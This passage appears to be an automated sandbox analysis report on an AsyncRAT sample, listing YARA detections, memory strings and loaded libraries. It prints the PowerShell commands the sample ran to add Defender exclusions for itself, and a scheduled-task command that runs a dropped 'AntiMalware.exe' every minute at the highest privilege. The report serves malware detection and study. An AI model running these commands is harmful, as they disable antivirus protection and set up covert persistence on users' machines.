                    Source: powershell.exe, 00000001.00000002.1758294326.0000022527DFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819001426.0000029D2E258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929254330.000001BB60519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2119318876.000001F3AE8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2822437837.0000000003301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1758294326.0000022527BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819001426.0000029D2E031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929254330.000001BB602F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2119318876.000001F3AE6A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000001.00000002.1758294326.0000022527DFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819001426.0000029D2E258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929254330.000001BB60519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2119318876.000001F3AE8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000000B.00000002.2119318876.000001F3AE8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000000B.00000002.2342826080.000001F3C6C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                    Source: powershell.exe, 00000009.00000002.2054985754.000001BB78A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                    Source: powershell.exe, 00000001.00000002.1758294326.0000022527BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819001426.0000029D2E031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929254330.000001BB602F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2119318876.000001F3AE6A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 0000000B.00000002.2307436349.000001F3BE712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000B.00000002.2307436349.000001F3BE712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000B.00000002.2307436349.000001F3BE712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 0000000B.00000002.2119318876.000001F3AE8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000001.00000002.1775201853.0000022537C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876405149.0000029D3E0A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2029842687.000001BB70364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2307436349.000001F3BE712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2865773480.000000001D600000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2865773480.000000001D600000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeCode function: 0_2_00007FFD9BA642FC CreateDesktopA,0_2_00007FFD9BA642FC

                    Operating System Destruction

                    barindex
                    Protects its processes via BreakOnTermination flag
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: 01 00 00 00 Jump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: KJhsNv2RcI.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.2.KJhsNv2RcI.exe.3400918.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: 0.2.KJhsNv2RcI.exe.15f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: 0.0.KJhsNv2RcI.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.2.KJhsNv2RcI.exe.15f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: 0.2.KJhsNv2RcI.exe.340ab98.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: 0.2.KJhsNv2RcI.exe.340ab98.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: 0.2.KJhsNv2RcI.exe.3400918.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: 00000000.00000002.2821186755.00000000015F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: 00000000.00000000.1669945553.0000000000E72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Performs an instant shutdown (NtRaiseHardError)
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeHard error raised: shutdownJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeCode function: 0_2_00007FFD9BA653D4 NtRaiseHardError,0_2_00007FFD9BA653D4
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeCode function: 0_2_00007FFD9B7F60260_2_00007FFD9B7F6026
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeCode function: 0_2_00007FFD9B7F22F10_2_00007FFD9B7F22F1
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeCode function: 0_2_00007FFD9B7F16D90_2_00007FFD9B7F16D9
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeCode function: 0_2_00007FFD9B7F6DD20_2_00007FFD9B7F6DD2
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeCode function: 0_2_00007FFD9B7FC4840_2_00007FFD9B7FC484
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeCode function: 0_2_00007FFD9B7F20590_2_00007FFD9B7F2059
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeCode function: 0_2_00007FFD9B7F9E480_2_00007FFD9B7F9E48
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeCode function: 0_2_00007FFD9B7FE2CA0_2_00007FFD9B7FE2CA
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 15_2_00007FFD9B7D16D915_2_00007FFD9B7D16D9
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 15_2_00007FFD9B7D0FF815_2_00007FFD9B7D0FF8
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 15_2_00007FFD9B7D205915_2_00007FFD9B7D2059
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 17_2_00007FFD9B7E16D917_2_00007FFD9B7E16D9
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 17_2_00007FFD9B7E0FF817_2_00007FFD9B7E0FF8
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 17_2_00007FFD9B7E205917_2_00007FFD9B7E2059
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FFD9B7F16D918_2_00007FFD9B7F16D9
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FFD9B7F0FF818_2_00007FFD9B7F0FF8
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FFD9B7F205918_2_00007FFD9B7F2059
                    Source: KJhsNv2RcI.exe, 00000000.00000000.1669993826.0000000000E84000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXtasy.exe4 vs KJhsNv2RcI.exe
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2822437837.00000000033DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOptions.dll0 vs KJhsNv2RcI.exe
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2821186755.00000000015F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOptions.dll0 vs KJhsNv2RcI.exe
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2865773480.000000001D600000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameStealer.dll0 vs KJhsNv2RcI.exe
                    Source: KJhsNv2RcI.exeBinary or memory string: OriginalFilenameXtasy.exe4 vs KJhsNv2RcI.exe
                    Source: KJhsNv2RcI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: KJhsNv2RcI.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.2.KJhsNv2RcI.exe.3400918.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 0.2.KJhsNv2RcI.exe.15f0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 0.0.KJhsNv2RcI.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.2.KJhsNv2RcI.exe.15f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 0.2.KJhsNv2RcI.exe.340ab98.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 0.2.KJhsNv2RcI.exe.340ab98.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 0.2.KJhsNv2RcI.exe.3400918.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 00000000.00000002.2821186755.00000000015F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 00000000.00000000.1669945553.0000000000E72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: KJhsNv2RcI.exe, 3asxm3zE8WKKq2mCowDWRa7Zqz1J1LgSLQIXjaZNMoAoiqanhL6gYsxdxef7cVWjbb5h6vA1M.csCryptographic APIs: 'TransformFinalBlock'
                    Source: KJhsNv2RcI.exe, 3asxm3zE8WKKq2mCowDWRa7Zqz1J1LgSLQIXjaZNMoAoiqanhL6gYsxdxef7cVWjbb5h6vA1M.csCryptographic APIs: 'TransformFinalBlock'
                    Source: KJhsNv2RcI.exe, brAnaade4ccS3WwSHgoibHVsyYy3mKAzEe8IUtBwSivJXoFqHhZcpmOu553Ff3jbmYuMJ6WHV.csCryptographic APIs: 'TransformFinalBlock'
                    Source: AntiMalware.exe.0.dr, 3asxm3zE8WKKq2mCowDWRa7Zqz1J1LgSLQIXjaZNMoAoiqanhL6gYsxdxef7cVWjbb5h6vA1M.csCryptographic APIs: 'TransformFinalBlock'
                    Source: AntiMalware.exe.0.dr, 3asxm3zE8WKKq2mCowDWRa7Zqz1J1LgSLQIXjaZNMoAoiqanhL6gYsxdxef7cVWjbb5h6vA1M.csCryptographic APIs: 'TransformFinalBlock'
                    Source: AntiMalware.exe.0.dr, brAnaade4ccS3WwSHgoibHVsyYy3mKAzEe8IUtBwSivJXoFqHhZcpmOu553Ff3jbmYuMJ6WHV.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.KJhsNv2RcI.exe.340ab98.1.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.KJhsNv2RcI.exe.340ab98.1.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.KJhsNv2RcI.exe.3400918.2.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.KJhsNv2RcI.exe.3400918.2.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.KJhsNv2RcI.exe.340ab98.1.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.KJhsNv2RcI.exe.340ab98.1.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: KJhsNv2RcI.exe, feKXYab47fChB1t3yM9LI6D4Lfs1KJgg7SBp6HFHY.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: KJhsNv2RcI.exe, feKXYab47fChB1t3yM9LI6D4Lfs1KJgg7SBp6HFHY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: AntiMalware.exe.0.dr, feKXYab47fChB1t3yM9LI6D4Lfs1KJgg7SBp6HFHY.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: AntiMalware.exe.0.dr, feKXYab47fChB1t3yM9LI6D4Lfs1KJgg7SBp6HFHY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.KJhsNv2RcI.exe.15f0000.0.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.KJhsNv2RcI.exe.15f0000.0.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.KJhsNv2RcI.exe.15f0000.0.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.KJhsNv2RcI.exe.15f0000.0.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.KJhsNv2RcI.exe.3400918.2.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.KJhsNv2RcI.exe.3400918.2.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@19/20@2/2
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeFile created: C:\Users\user\AppData\Roaming\AntiMalware.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeMutant created: \Sessions\1\BaseNamedObjects\Zi3xMsqjubd37PNN
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1i122oc.uyz.ps1Jump to behavior
                    Source: KJhsNv2RcI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: KJhsNv2RcI.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: KJhsNv2RcI.exeReversingLabs: Detection: 84%
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeFile read: C:\Users\user\Desktop\KJhsNv2RcI.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\KJhsNv2RcI.exe "C:\Users\user\Desktop\KJhsNv2RcI.exe"
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KJhsNv2RcI.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\AntiMalware.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AntiMalware.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AntiMalware" /tr "C:\Users\user\AppData\Roaming\AntiMalware.exe"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\AntiMalware.exe C:\Users\user\AppData\Roaming\AntiMalware.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\AntiMalware.exe "C:\Users\user\AppData\Roaming\AntiMalware.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\AntiMalware.exe "C:\Users\user\AppData\Roaming\AntiMalware.exe"
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KJhsNv2RcI.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\AntiMalware.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AntiMalware.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AntiMalware" /tr "C:\Users\user\AppData\Roaming\AntiMalware.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
